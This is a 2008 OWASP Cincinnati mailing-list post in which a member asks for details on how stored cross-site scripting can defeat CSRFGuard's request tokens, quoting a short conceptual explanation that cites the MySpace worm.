[Owasp-cincinnati] Could someone explain how to bypass CSRF attack with stored XSS

Zhou, Yan yzhou at medplus.com
Wed Feb 27 10:01:52 EST 2008


Hi there, 

 

Could someone explain in a little more detail how this is done? I think
I know the principle, but would like to see how that is actually carried
out. 

 

Thanks,

Yan

 


Bypass CSRFGuard With Stored XSS 


There have been discussions suggesting that the unique request token can
be compromised using JavaScript. This attack implies that the
application also contains a stored cross-site scripting vulnerability,
which is frequently a more severe issue than cross-site request forgery.
The first MySpace worm worked in this manner where it used a Cross Site
Scripting vulnerability to forge requests to update a user's profile,
where the user profile update mechanism was protected with a CSRF
defense mechanism similar to what is provided by this filter. If your
application contains a stored cross-site scripting vulnerability, then
the unique request token can be parsed from the HTML response to
successfully forge form submissions. 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-cincinnati/attachments/20080227/d5a14640/attachment.html 


More information about the Owasp-cincinnati mailing list